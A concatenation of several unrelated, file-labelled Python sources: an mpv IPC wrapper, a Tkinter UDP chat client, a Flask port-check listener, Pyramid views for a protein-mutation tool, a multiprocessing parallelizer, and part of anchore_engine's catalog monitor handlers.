raise MPVCommunicationError("invalid message %r" % message)
def _send_message(self, message, timeout=None):
"""Send a message/command to the mpv process, message must be a
dictionary of the form {"command": ["arg1", "arg2", ...]}. Responses
from the mpv process must be collected using _get_response().
"""
data = self._compose_message(message)
if self.debug:
sys.stdout.write(">>> " + data.decode("utf8", "replace"))
# Request/response cycles are coordinated across different threads, so
# that they don't get mixed up. This makes it possible to use commands
# (e.g. fetch properties) from event callbacks that run in a different
# thread context.
thread_id = self._thread_id()
if thread_id not in self._response_queues:
# Prepare a response queue for the thread to wait on.
self._response_queues[thread_id] = Queue()
# Put the id of the current thread on the request queue. This id is
# later used to associate responses from the mpv process with this
# request.
try:
self._request_queue.put(thread_id, block=True, timeout=timeout)
except Full:
raise MPVTimeoutError("unable to put request")
# Write the message data to the socket.
if isWin:
win32file.WriteFile(self._sock, data)
else:
while data:
size = self._sock.send(data)
if size == 0:
raise MPVCommunicationError("broken sender socket")
data = data[size:]
def _get_response(self, timeout=None):
"""Collect the response message to a previous request. If there was an
error a MPVCommandError exception is raised, otherwise the command
specific data is returned.
"""
try:
message = self._response_queues[self._thread_id()].get(block=True, timeout=timeout)
except Empty:
raise MPVTimeoutError("unable to get response")
if message["error"] != "success":
raise MPVCommandError(message["error"])
else:
return message.get("data")
def _get_event(self, timeout=None):
"""Collect a single event message that has been received out-of-band
from the mpv process. If a timeout is specified and there have not
been any events during that period, None is returned.
"""
try:
return self._event_queue.get(block=timeout is not None, timeout=timeout)
except Empty:
return None
def _send_request(self, message, timeout=None):
"""Send a command to the mpv process and collect the result.
"""
self.ensure_running()
self._send_message(message, timeout)
try:
return self._get_response(timeout)
except MPVCommandError as e:
raise MPVCommandError("%r: %s" % (message["command"], e))
#
# Public API
#
def is_running(self):
"""Return True if the mpv process is still active.
"""
return self._proc.poll() is None
def ensure_running(self):
if not self.is_running():
self._stop_thread()
self._stop_process()
self._stop_socket()
self._prepare_socket()
self._prepare_process()
self._start_process()
self._start_socket()
self._prepare_thread()
self._start_thread()
def close(self):
"""Shutdown the mpv process and our communication setup.
"""
if self.is_running():
self._send_request({"command": ["quit"]}, timeout=1)
self._stop_process()
self._stop_thread()
self._stop_socket()
self._stop_process()
class MPV(MPVBase):
"""Class for communication with the mpv media player via unix socket
based JSON IPC. It adds a few usable methods and a callback API.
To automatically register methods as event callbacks, subclass this
class and define specially named methods as follows:
def on_file_loaded(self):
# This is called for every 'file-loaded' event.
...
def on_property_time_pos(self, position):
# This is called whenever the 'time-pos' property is updated.
...
Please note that callbacks are executed inside a separate thread. The
MPV class itself is completely thread-safe. Requests from different
threads to the same MPV instance are synchronized.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._callbacks = {}
self._property_serials = {}
self._new_serial = iter(range(sys.maxsize))
# Enumerate all methods and auto-register callbacks for
# events and property-changes.
for method_name, method in inspect.getmembers(self):
if not inspect.ismethod(method):
continue
if method_name.startswith("on_property_"):
name = method_name[12:]
name = name.replace("_", "-")
self.register_property_callback(name, method)
elif method_name.startswith("on_"):
name = method_name[3:]
name = name.replace("_", "-")
self.register_callback(name, method)
# Simulate an init event when the process and all callbacks have been
# completely set up.
if hasattr(self, "on_init"):
self.on_init()
#
# Socket communication
#
def _start_thread(self):
"""Start up the communication threads.
"""
super()._start_thread()
self._event_thread = threading.Thread(target=self._event_reader)
self._event_thread.start()
def _stop_thread(self):
"""Stop the communication threads.
"""
super()._stop_thread()
if hasattr(self, "_event_thread"):
self._event_thread.join()
#
# Event/callback API
#
def _event_reader(self):
"""Collect incoming event messages and call the event handler.
"""
while not self._stop_event.is_set():
message = self._get_event(timeout=1)
if message is None:
continue
self._handle_event(message)
def _handle_event(self, message):
"""Lookup and call the callbacks for a particular event message.
"""
if message["event"] == "property-change":
name = "property-" + message["name"]
else:
name = message["event"]
for callback in self._callbacks.get(name, []):
if "data" in message:
callback(message["data"])
else:
callback()
def register_callback(self, name, callback):
"""Register a function `callback` for the event `name`.
"""
try:
self.command("enable_event", name)
except MPVCommandError:
raise MPVError("no such event %r" % name)
self._callbacks.setdefault(name, []).append(callback)
def unregister_callback(self, name, callback):
"""Unregister a previously registered function `callback` for the event
`name`.
"""
try:
callbacks = self._callbacks[name]
except KeyError:
raise MPVError("no callbacks registered for event %r" % name)
try:
callbacks.remove(callback)
except ValueError:
raise MPVError("callback %r not registered for event %r" % (callback, name))
def register_property_callback(self, name, callback):
"""Register a function `callback` for the property-change event on
property `name`.
"""
# Property changes are normally not sent over the connection unless they
# are requested using the 'observe_property' command.
# XXX We manually have to check for the existence of the property name.
# Apparently observe_property does not check it :-(
proplist = self.command("get_property", "property-list")
if name not in proplist:
raise MPVError("no such property %r" % name)
self._callbacks.setdefault("property-" + name, []).append(callback)
# 'observe_property' expects some kind of id which can be used later
# for unregistering with 'unobserve_property'.
serial = next(self._new_serial)
self.command("observe_property", serial, name)
self._property_serials[(name, callback)] = serial
return serial
def unregister_property_callback(self, name, callback):
"""Unregister a previously registered function `callback` for the
property-change event on property `name`.
"""
try:
callbacks = self._callbacks["property-" + name]
except KeyError:
raise MPVError("no callbacks registered for property %r" % name)
try:
callbacks.remove(callback)
except ValueError:
raise MPVError("callback %r not registered for property %r" % (callback, name))
serial = self._property_serials.pop((name, callback))
self.command("unobserve_property", serial)
#
# Public API
#
def command(self, *args, timeout=1):
"""Execute a single command on the mpv process and return the result.
"""
return self._send_request({"command": list(args)}, timeout=timeout)
def get_property(self, name):
"""Return the value of property `name`.
"""
return self.command("get_property", name)
def set_property(self, name, value):
"""Set the value of property `name`.
"""
return self.command("set_property", name, value)
|
client.py | import socket
import threading
from Tkinter import Tk, Entry, Frame, StringVar, Scrollbar, Listbox, END, X, BOTTOM, Y, RIGHT, LEFT, BOTH
from random import randint
def receive_data(sock):
while True:
try:
data, addr = sock.recvfrom(4096)
if data:
msg_list.insert(END, '%s\n' % data)
except OSError:
continue
def enter_pressed(event):
global sock
input_get = input_field.get()
name = name_field.get()
if input_get:
sock.sendto("{}: {}".format(name, input_get), server_host)
input_user.set('')
return
server_host = ('127.0.0.1', 5000)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('', 0))
sock.sendto(" ", server_host)
threading.Thread(target=receive_data, args=(sock,)).start()
root = Tk()
root.title("Tkinter Chat")
messages_frame = Frame(root)
scrollbar = Scrollbar(messages_frame)
msg_list = Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)
scrollbar.pack(side=RIGHT, fill=Y)
msg_list.pack(side=LEFT, fill=BOTH)
msg_list.pack()
messages_frame.pack()
input_name = StringVar()
name_field = Entry(root, text=input_name)
name_field.insert(0, 'Guest' + str(randint(1000, 9999)))
name_field.pack()
input_user = StringVar()
input_field = Entry(root, text=input_user)
input_field.pack(side=BOTTOM, fill=X)
frame = Frame(root)
input_field.bind("<Return>", enter_pressed)
frame.pack()
root.mainloop()
|
http_listener.py | #!/usr/bin/env python3
import swimlane_environment_validator.lib.config as config
import swimlane_environment_validator.lib.log_handler as log_handler
from threading import Thread
from flask import Flask
import click
import ssl
from OpenSSL import crypto, SSL
logger = log_handler.setup_logger()
app = Flask(__name__)
def serve_on_port(port):
logger.info("Starting http listener on {}...".format(port))
app = Flask(__name__)
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def catch_all(path):
return '{ "status" : "ok" }'
# Silence the Flask development server logging
if config.arguments.debug == False:
def secho(text, file=None, nl=None, err=None, color=None, **styles):
pass
def echo(text, file=None, nl=None, err=None, color=None, **styles):
pass
click.echo = echo
click.secho = secho
try:
app.run(host='0.0.0.0', port=port, ssl_context='adhoc')
except Exception:
logger.error('Couldnt start listener on port {}, is something already listening? Ports below 1024 can only be spawned by root.'.format(port))
logger.debug("Caught exception while starting listener thread ", exc_info=True)
def start_lb_listener_threads():
for port in config.LB_CONNECTIVITY_PORTS:
thread = Thread(target=serve_on_port, args=[port])
thread.daemon = True
thread.start()
def start_intra_cluster_listener_threads():
for listener in config.INTRA_CLUSTER_PORTS:
listener_thread = Thread(target=serve_on_port, args=[listener])
listener_thread.daemon = True
listener_thread.start()
|
ajax.py |
@view_config(route_name='gene_check', renderer="json")
def gene_check_view(request):
"""
This is the first one that gets called. It starts a series of parallel jobs, whose IDs are stored in request.session['threads'].
:param request:
:return:
"""
print(request.POST)
if request.POST['gene'] in namedex:
uniprot = namedex[request.POST['gene']]
gene_name = genedex[uniprot]
request.session['gene_name'] = gene_name
### if there is already a pickle file...
if os.path.isfile(os.path.join('data', 'pickle', uniprot + '.p')):
### if there is already a pickle file...
request.session['threads'] = dict() ## this is an odd case.
else:
(variant, threads) = parallel_parse_protein(uniprot=uniprot, gene_name=gene_name, return_complete=False)
request.session['threads'] = {fn.name: tn for tn, fn in threads.items()}
saver = threading.Thread(target=save_factory(variant, threads, request))
saver.start()
request.session['uniprot'] = uniprot
# request.session['data'] = {} ### does not work!!!
return {'uniprot_name': uniprot}
else:
return {'error': 'Not found'}
@view_config(route_name='mut_check', renderer="json")
def mut_check_view(request):
"""
Absolutely no storing of the mutation data or else it might get pickled.
:param request:
:return:
"""
try:
variant = Protein()
variant.sequence = seqdex[request.session['uniprot']]
mutation = Mutation(request.POST['mutation'])
if variant.check_mutation(mutation):
return {'valid': 1}
else:
return {'error': variant.msg_error_sequence(variant.sequence)}
except Exception as err:
print(err)
return {'error': str(err)}
if os.path.isfile(os.path.join('data', 'pickle', uniprot + '.p')) and 1==0: ### if there is already a pickle file, which theere should be eventually.
request.session['threads'] = dict() ## this is an odd case.
else:
protein.parse_all(mode='background')
@view_config(route_name='task_check', renderer="json")
def status_check_view(request):
if 'threads' in request.session:
unfinished = [t.name for t in threading.enumerate() if t.name in request.session['threads'].keys()]
status = [tdescr for tname, tdescr in request.session['threads'].items() if tname in unfinished]
return {'status': status, 'unfinished': len(status)}
else:
return {'error': 'No job found'}
@view_config(route_name='get_results', renderer="../templates/results.mako") # default mako renderer giving me problems.
def get_results_view(request):
variant = Protein.load('data/pickle/' + request.session['uniprot'] + '.p')
variant.parse_mutation(request.POST['mutation']) ## added here like this to avoid it getting saved.
variant.predict_effect()
return {'variant': variant}
############################ DEPRACATION IN PROGTRSS
# @view_config(route_name='get_results', renderer="../templates/results.mako") # default mako renderer giving me problems.
def old_get_results_view(request):
variant = Variant.load('data/pickle/' + request.session['uniprot'] + '.p')
variant.parse_mutation(request.POST['mutation']) ## added here like this to avoid it getting saved.
variant.predict_effect()
return {'variant': variant}
#### TODO move out once complte.
def parallel_parse_protein(uniprot, gene_name, return_complete=True):
"""
A parallel version of the protein fetcher.
It deals with the non-mutation parts of the Variant.
:param uniprot:
:param gene_name:
:param return_complete: a boolean flag that either returns the threads if False, or waits for the threads to complete if true.
:return:
"""
self = Protein()
self.verbose = True # for now.
self.from_pickle = False
self.uniprot = uniprot
self.gene = gene_name # gene_name
tasks = {'Uniprot': self.parse_uniprot}
threads = {}
for k, fn in tasks.items():
t = threading.Thread(target=fn)
t.start()
threads[k] = t
if return_complete:
for tn, t in threads.items():
t.join()
return self
else:
return (self, threads)
def save_factory(variant, threads, request):
def saver():
for tn, t in threads.items():
t.join()
variant.resi = 1
variant.to_resn = 'M'
variant.from_resn = 'M'
# request.session['data']=variant.__dict__
variant.dump('data/pickle/' + variant.uniprot + '.p')
return saver
|
parallelizer.py | # -*- coding: utf-8 -*-
import os, sys, time, multiprocessing, re
from .processes import ForkedProcess
from .remoteproxy import ClosedError
from ..python2_3 import basestring, xrange
class CanceledError(Exception):
"""Raised when the progress dialog is canceled during a processing operation."""
pass
class Parallelize(object):
"""
Class for ultra-simple inline parallelization on multi-core CPUs
Example::
## Here is the serial (single-process) task:
tasks = [1, 2, 4, 8]
results = []
for task in tasks:
result = processTask(task)
results.append(result)
print(results)
## Here is the parallelized version:
tasks = [1, 2, 4, 8]
results = []
with Parallelize(tasks, workers=4, results=results) as tasker:
for task in tasker:
result = processTask(task)
tasker.results.append(result)
print(results)
The only major caveat is that *result* in the example above must be picklable,
since it is automatically sent via pipe back to the parent process.
"""
def __init__(self, tasks=None, workers=None, block=True, progressDialog=None, randomReseed=True, **kwds):
"""
=============== ===================================================================
**Arguments:**
tasks list of objects to be processed (Parallelize will determine how to
distribute the tasks). If unspecified, then each worker will receive
a single task with a unique id number.
workers number of worker processes or None to use number of CPUs in the
system
progressDialog optional dict of arguments for ProgressDialog
to update while tasks are processed
randomReseed If True, each forked process will reseed its random number generator
to ensure independent results. Works with the built-in random
and numpy.random.
kwds objects to be shared by proxy with child processes (they will
appear as attributes of the tasker)
=============== ===================================================================
"""
## Generate progress dialog.
## Note that we want to avoid letting forked child processes play with progress dialogs..
self.showProgress = False
if progressDialog is not None:
self.showProgress = True
if isinstance(progressDialog, basestring):
progressDialog = {'labelText': progressDialog}
from ..widgets.ProgressDialog import ProgressDialog
self.progressDlg = ProgressDialog(**progressDialog)
if workers is None:
workers = self.suggestedWorkerCount()
if not hasattr(os, 'fork'):
workers = 1
self.workers = workers
if tasks is None:
tasks = range(workers)
self.tasks = list(tasks)
self.reseed = randomReseed
self.kwds = kwds.copy()
self.kwds['_taskStarted'] = self._taskStarted
def __enter__(self):
self.proc = None
if self.workers == 1:
return self.runSerial()
else:
return self.runParallel()
def __exit__(self, *exc_info):
if self.proc is not None: ## worker
exceptOccurred = exc_info[0] is not None ## hit an exception during processing.
try:
if exceptOccurred:
sys.excepthook(*exc_info)
finally:
#print os.getpid(), 'exit'
os._exit(1 if exceptOccurred else 0)
else: ## parent
if self.showProgress:
try:
self.progressDlg.__exit__(None, None, None)
except Exception:
pass
def runSerial(self):
if self.showProgress:
self.progressDlg.__enter__()
self.progressDlg.setMaximum(len(self.tasks))
self.progress = {os.getpid(): []}
return Tasker(self, None, self.tasks, self.kwds)
def runParallel(self):
self.childs = []
## break up tasks into one set per worker
workers = self.workers
chunks = [[] for i in xrange(workers)]
i = 0
for i in range(len(self.tasks)):
chunks[i%workers].append(self.tasks[i])
## fork and assign tasks to each worker
for i in range(workers):
proc = ForkedProcess(target=None, preProxy=self.kwds, randomReseed=self.reseed)
if not proc.isParent:
self.proc = proc
return Tasker(self, proc, chunks[i], proc.forkedProxies)
else:
self.childs.append(proc)
## Keep track of the progress of each worker independently.
self.progress = dict([(ch.childPid, []) for ch in self.childs])
## for each child process, self.progress[pid] is a list
## of task indexes. The last index is the task currently being
## processed; all others are finished.
try:
if self.showProgress:
self.progressDlg.__enter__()
self.progressDlg.setMaximum(len(self.tasks))
## process events from workers until all have exited.
activeChilds = self.childs[:]
self.exitCodes = []
pollInterval = 0.01
while len(activeChilds) > 0:
waitingChildren = 0
rem = []
for ch in activeChilds:
try:
n = ch.processRequests()
if n > 0:
waitingChildren += 1
except ClosedError:
#print ch.childPid, 'process finished'
rem.append(ch)
if self.showProgress:
self.progressDlg += 1
#print "remove:", [ch.childPid for ch in rem]
for ch in rem:
activeChilds.remove(ch)
while True:
try:
pid, exitcode = os.waitpid(ch.childPid, 0)
self.exitCodes.append(exitcode)
break
except OSError as ex:
if ex.errno == 4: ## If we get this error, just try again
continue
#print "Ignored system call interruption"
else:
raise
#print [ch.childPid for ch in activeChilds]
if self.showProgress and self.progressDlg.wasCanceled():
for ch in activeChilds:
ch.kill()
raise CanceledError()
## adjust polling interval--prefer to get exactly 1 event per poll cycle.
if waitingChildren > 1:
pollInterval *= 0.7
elif waitingChildren == 0:
pollInterval /= 0.7
pollInterval = max(min(pollInterval, 0.5), 0.0005) ## but keep it within reasonable limits
time.sleep(pollInterval)
finally:
if self.showProgress:
self.progressDlg.__exit__(None, None, None)
for ch in self.childs:
ch.join()
if len(self.exitCodes) < len(self.childs):
raise Exception("Parallelizer started %d processes but only received exit codes from %d." % (len(self.childs), len(self.exitCodes)))
for code in self.exitCodes:
if code != 0:
raise Exception("Error occurred in parallel-executed subprocess (console output may have more information).")
return [] ## no tasks for parent process.
@staticmethod
def suggestedWorkerCount():
if 'linux' in sys.platform:
## I think we can do a little better here..
## cpu_count does not consider that there is little extra benefit to using hyperthreaded cores.
try:
cores = {}
pid = None
with open('/proc/cpuinfo') as fd:
for line in fd:
m = re.match(r'physical id\s+:\s+(\d+)', line)
if m is not None:
pid = m.groups()[0]
m = re.match(r'cpu cores\s+:\s+(\d+)', line)
if m is not None:
cores[pid] = int(m.groups()[0])
return sum(cores.values())
except:
return multiprocessing.cpu_count()
else:
return multiprocessing.cpu_count()
def _taskStarted(self, pid, i, **kwds):
## called remotely by tasker to indicate it has started working on task i
#print pid, 'reported starting task', i
if self.showProgress:
if len(self.progress[pid]) > 0:
self.progressDlg += 1
if pid == os.getpid(): ## single-worker process
if self.progressDlg.wasCanceled():
raise CanceledError()
self.progress[pid].append(i)
class Tasker(object):
def __init__(self, parallelizer, process, tasks, kwds):
self.proc = process
self.par = parallelizer
self.tasks = tasks
for k, v in kwds.items():
setattr(self, k, v)
def __iter__(self):
## we could fix this up such that tasks are retrieved from the parent process one at a time..
for i, task in enumerate(self.tasks):
self.index = i
#print os.getpid(), 'starting task', i
self._taskStarted(os.getpid(), i, _callSync='off')
yield task
if self.proc is not None:
#print os.getpid(), 'no more tasks'
self.proc.close()
def process(self):
"""
Process requests from parent.
Usually it is not necessary to call this unless you would like to
receive messages (such as exit requests) during an iteration.
"""
if self.proc is not None:
self.proc.processRequests()
def numWorkers(self):
"""
Return the number of parallel workers
"""
return self.par.workers
#class Parallelizer:
#"""
#Use::
#p = Parallelizer()
#with p(4) as i:
#p.finish(do_work(i))
#print p.results()
#"""
#def __init__(self):
#pass
#def __call__(self, n):
#self.replies = []
#self.conn = None ## indicates this is the parent process
#return Session(self, n)
#def finish(self, data):
#if self.conn is None:
#self.replies.append((self.i, data))
#else:
##print "send", self.i, data
#self.conn.send((self.i, data))
#os._exit(0)
#def result(self):
#print self.replies
#class Session:
#def __init__(self, par, n):
#self.par = par
#self.n = n
#def __enter__(self):
#self.childs = []
#for i in range(1, self.n):
#c1, c2 = multiprocessing.Pipe()
#pid = os.fork()
#if pid == 0: ## child
#self.par.i = i
#self.par.conn = c2
#self.childs = None
#c1.close()
#return i
#else:
#self.childs.append(c1)
#c2.close()
#self.par.i = 0
#return 0
#def __exit__(self, *exc_info):
#if exc_info[0] is not None:
#sys.excepthook(*exc_info)
#if self.childs is not None:
#self.par.replies.extend([conn.recv() for conn in self.childs])
#else:
#self.par.finish(None)
|
__init__.py | import json
import os
import copy
import threading
import time
import pkg_resources
from sqlalchemy.exc import IntegrityError
# anchore modules
import anchore_engine.clients.anchoreio
import anchore_engine.common.helpers
import anchore_engine.common.images
from anchore_engine.clients.services import internal_client_for
from anchore_engine.clients.services import simplequeue
from anchore_engine.clients.services.simplequeue import SimpleQueueClient
from anchore_engine.clients.services.policy_engine import PolicyEngineClient
import anchore_engine.configuration.localconfig
import anchore_engine.subsys.servicestatus
import anchore_engine.subsys.metrics
import anchore_engine.common
import anchore_engine.clients.services.common
from anchore_engine.clients import docker_registry
from anchore_engine import db
from anchore_engine.db import db_catalog_image, db_policybundle, db_queues, db_registries, db_subscriptions, \
db_accounts, db_anchore, db_services, db_events, AccountStates, AccountTypes, ArchiveTransitionRule
from anchore_engine.subsys import notifications, taskstate, logger, archive, object_store
from anchore_engine.services.catalog import catalog_impl
import anchore_engine.subsys.events as events
from anchore_engine.utils import AnchoreException
from anchore_engine.services.catalog.exceptions import TagManifestParseError, TagManifestNotFoundError, PolicyBundleValidationError
from anchore_engine.service import ApiService, LifeCycleStages
from anchore_engine.common.helpers import make_policy_record
from anchore_engine.subsys.identities import manager_factory
from anchore_engine.services.catalog import archiver
from anchore_engine.subsys.object_store.config import DEFAULT_OBJECT_STORE_MANAGER_ID, ANALYSIS_ARCHIVE_MANAGER_ID, ALT_OBJECT_STORE_CONFIG_KEY
##########################################################
# monitor section
def do_user_resources_delete(userId):
return_object = {}
httpcode = 500
resourcemaps = [
("subscriptions", db.db_subscriptions.get_all_byuserId, catalog_impl.do_subscription_delete),
("registries", db.db_registries.get_byuserId, catalog_impl.do_registry_delete),
("evaluations", db.db_policyeval.get_all_byuserId, catalog_impl.do_evaluation_delete),
("policybundles", db.db_policybundle.get_all_byuserId, catalog_impl.do_policy_delete),
("images", db.db_catalog_image.get_all_byuserId, catalog_impl.do_image_delete),
("archive", db.db_archivemetadata.list_all_byuserId, catalog_impl.do_archive_delete),
]
limit = 2048
all_total = 0
all_deleted = 0
for resourcename,getfunc,delfunc in resourcemaps:
try:
deleted = 0
total = 0
with db.session_scope() as dbsession:
records = getfunc(userId, session=dbsession, limit=limit)
total = len(records)
for record in records:
delfunc(userId, record, dbsession, force=True)
deleted = deleted + 1
return_object['total_{}'.format(resourcename)] = total
return_object['total_{}_deleted'.format(resourcename)] = deleted
all_total = all_total + total
all_deleted = all_deleted + deleted
if total or deleted:
logger.debug("deleted {} / {} {} records for user {}".format(deleted, total, resourcename, userId))
except Exception as err:
logger.warn("failed to delete resources in {} for user {}, will continue and try again - exception: {}".format(resourcename, userId, err))
return_object['all_total'] = all_total
return_object['all_deleted'] = all_deleted
httpcode = 200
return(return_object, httpcode)
def handle_account_resource_cleanup(*args, **kwargs):
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
try:
# iterate over all deleted account records, and perform resource cleanup for that account. If there are no longer any resources associated with the account id, then finally delete the account record itself
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.deleting, include_service=False)
for account in accounts:
userId = account['name']
logger.debug("Inspecting account {} for resource cleanup tasks".format(userId))
try:
return_object, httpcode = do_user_resources_delete(userId)
logger.debug("Resources for deleted account cleaned-up: {} - {}".format(return_object, httpcode))
if return_object.get('all_total', None) == 0 and return_object.get('all_deleted', None) == 0:
logger.debug("Resources for pending deleted user {} cleared - deleting account".format(userId))
with db.session_scope() as session:
mgr = manager_factory.for_session(session)
mgr.delete_account(userId)
else:
logger.debug("resources for pending deleted user {} not entirely cleared this cycle".format(userId))
except Exception as err:
raise Exception("failed to delete user {} resources - exception: {}".format(userId, err))
except Exception as err:
logger.warn("failure in handler - exception: " + str(err))
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return (True)
def handle_vulnerability_scan(*args, **kwargs):
global feed_sync_updated
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
try:
all_ready = anchore_engine.clients.services.common.check_services_ready(['policy_engine'])
if not all_ready:
logger.debug("FIRING DONE: feed syncer (skipping due to required services not being available)")
try:
kwargs['mythread']['last_return'] = False
except:
pass
return (True)
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
for account in accounts:
userId = account['name']
# vulnerability scans
doperform = False
vuln_subs = []
for subscription_type in ['vuln_update']:
dbfilter = {'subscription_type': subscription_type}
with db.session_scope() as dbsession:
subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
for subscription_record in subscription_records:
if subscription_record['active']:
image_info = anchore_engine.common.images.get_image_info(userId, "docker", subscription_record[
'subscription_key'], registry_lookup=False, registry_creds=(None, None))
dbfilter = {'registry': image_info['registry'], 'repo': image_info['repo'],
'tag': image_info['tag']}
if (dbfilter, subscription_record['subscription_value']) not in vuln_subs:
vuln_subs.append((dbfilter, subscription_record['subscription_value']))
for (dbfilter, value) in vuln_subs:
with db.session_scope() as dbsession:
image_records = db_catalog_image.get_byimagefilter(userId, 'docker', dbfilter=dbfilter,
onlylatest=False, session=dbsession)
if value:
try:
subscription_value = json.loads(value)
digests = set(subscription_value['digests'])
except Exception as err:
digests = set()
else:
digests = set()
# always add latest version of the image
if len(image_records) > 0:
digests.add(image_records[0]['imageDigest'])
current_imageDigest = image_records[0]['imageDigest']
for image_record in image_records:
if image_record['analysis_status'] == taskstate.complete_state('analyze'):
imageDigest = image_record['imageDigest']
if imageDigest not in digests:
continue
fulltag = dbfilter['registry'] + "/" + dbfilter['repo'] + ":" + dbfilter['tag']
doperform = True
if doperform:
logger.debug("calling vuln scan perform: " + str(fulltag) + " : " + str(imageDigest))
with db.session_scope() as dbsession:
try:
rc = catalog_impl.perform_vulnerability_scan(userId, imageDigest, dbsession, scantag=fulltag, force_refresh=False, is_current=(imageDigest==current_imageDigest))
except Exception as err:
logger.warn("vulnerability scan failed - exception: " + str(err))
except Exception as err:
logger.warn("failure in feed sync handler - exception: " + str(err))
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return (True)
def handle_service_watcher(*args, **kwargs):
# global latest_service_records
cycle_timer = kwargs['mythread']['cycle_timer']
max_service_heartbeat_timer = 300
max_service_orphaned_timer = 3600
max_service_cleanup_timer = 86400
while (True):
logger.debug("FIRING: service watcher")
localconfig = anchore_engine.configuration.localconfig.get_config()
verify = localconfig['internal_ssl_verify']
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
event_account = anchore_engine.configuration.localconfig.ADMIN_ACCOUNT_NAME
anchore_services = db_services.get_all(session=dbsession)
# update the global latest service record dict in services.common
# latest_service_records.update({"service_records": copy.deepcopy(anchore_services)})
# fields to update each tick:
#
# heartbeat (current time)
# status (true/false)
# status_message (state of service)
# short_description(api return)
#
for service in anchore_services:
event = None
service_update_record = {}
if service['servicename'] == 'catalog' and service['hostid'] == localconfig['host_id']:
status = anchore_engine.subsys.servicestatus.get_status(service)
service_update_record.update({'heartbeat': int(time.time()), 'status': True,
'status_message': taskstate.complete_state('service_status'),
'short_description': json.dumps(status)})
else:
try:
try:
status = json.loads(service['short_description'])
except:
status = {'up': False, 'available': False}
# set to down until the response can be parsed
service_update_record['status'] = False
service_update_record['status_message'] = taskstate.fault_state('service_status')
service_update_record['short_description'] = "could not get service status description"
try:
# NOTE: this is where any service-specific decisions based on the 'status' record could happen - now all services are the same
if status['up'] and status['available']:
if time.time() - service['heartbeat'] > max_service_heartbeat_timer:
logger.warn("no service heartbeat within allowed time period ({}) for service ({}/{}) - disabling service".format(max_service_heartbeat_timer, service['hostid'], service['servicename']))
service_update_record[
'short_description'] = "no heartbeat from service in ({}) seconds".format(
max_service_heartbeat_timer)
# Trigger an event to log the down service
event = events.ServiceDownEvent(user_id=event_account, name=service['servicename'],
host=service['hostid'],
url=service['base_url'],
cause='no heartbeat from service in ({}) seconds'.format(
max_service_heartbeat_timer))
else:
service_update_record['status'] = True
service_update_record['status_message'] = taskstate.complete_state('service_status')
try:
service_update_record['short_description'] = json.dumps(status)
except:
service_update_record['short_description'] = str(status)
else:
# handle the down state transitions
if time.time() - service['heartbeat'] > max_service_cleanup_timer:
# remove the service entirely
logger.warn("no service heartbeat within allowed time period ({}) for service ({}/{}) - removing service".format(max_service_cleanup_timer, service['hostid'], service['servicename']))
try:
# remove the service record from DB
removed_hostid = service['hostid']
removed_servicename = service['servicename']
removed_base_url = service['base_url']
db_services.delete(removed_hostid, removed_servicename, session=dbsession)
service_update_record = None
# Trigger an event to log the orphaned service, only on transition
event = events.ServiceRemovedEvent(user_id=event_account, name=removed_servicename,
host=removed_hostid,
url=removed_base_url,
cause='no heartbeat from service in ({}) seconds'.format(
max_service_cleanup_timer))
except Exception as err:
logger.warn("attempt to remove service {}/{} failed - exception: {}".format(service.get('hostid'), service.get('servicename'), err))
elif time.time() - service['heartbeat'] > max_service_orphaned_timer:
# transition down service to orphaned
logger.warn("no service heartbeat within allowed time period ({}) for service ({}/{}) - orphaning service".format(max_service_orphaned_timer, service['hostid'], service['servicename']))
service_update_record['status'] = False
service_update_record['status_message'] = taskstate.orphaned_state('service_status')
service_update_record[
'short_description'] = "no heartbeat from service in ({}) seconds".format(
max_service_orphaned_timer)
if service['status_message'] != taskstate.orphaned_state('service_status'):
# Trigger an event to log the orphaned service, only on transition
event = events.ServiceOrphanedEvent(user_id=event_account, name=service['servicename'],
host=service['hostid'],
url=service['base_url'],
cause='no heartbeat from service in ({}) seconds'.format(
max_service_orphaned_timer))
except Exception as err:
logger.warn(
"could not get/parse service status record for service: - exception: " + str(err))
except Exception as err:
logger.warn(
"could not get service status: " + str(service) + " : exception: " + str(err) + " : " + str(
err.__dict__))
if service_update_record:
service_update_record['status'] = False
service_update_record['status_message'] = taskstate.fault_state('service_status')
service_update_record['short_description'] = "could not get service status"
finally:
if event:
_add_event(event)
if service_update_record:
service.update(service_update_record)
try:
db_services.update_record(service, session=dbsession)
except Exception as err:
logger.warn("could not update DB: " + str(err))
logger.debug("FIRING DONE: service watcher")
try:
kwargs['mythread']['last_return'] = True
except:
pass
time.sleep(cycle_timer)
return (True)
def handle_repo_watcher(*args, **kwargs):
global system_user_auth
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
for account in accounts:
userId = account['name']
dbfilter = {}
with db.session_scope() as dbsession:
dbfilter['subscription_type'] = 'repo_update'
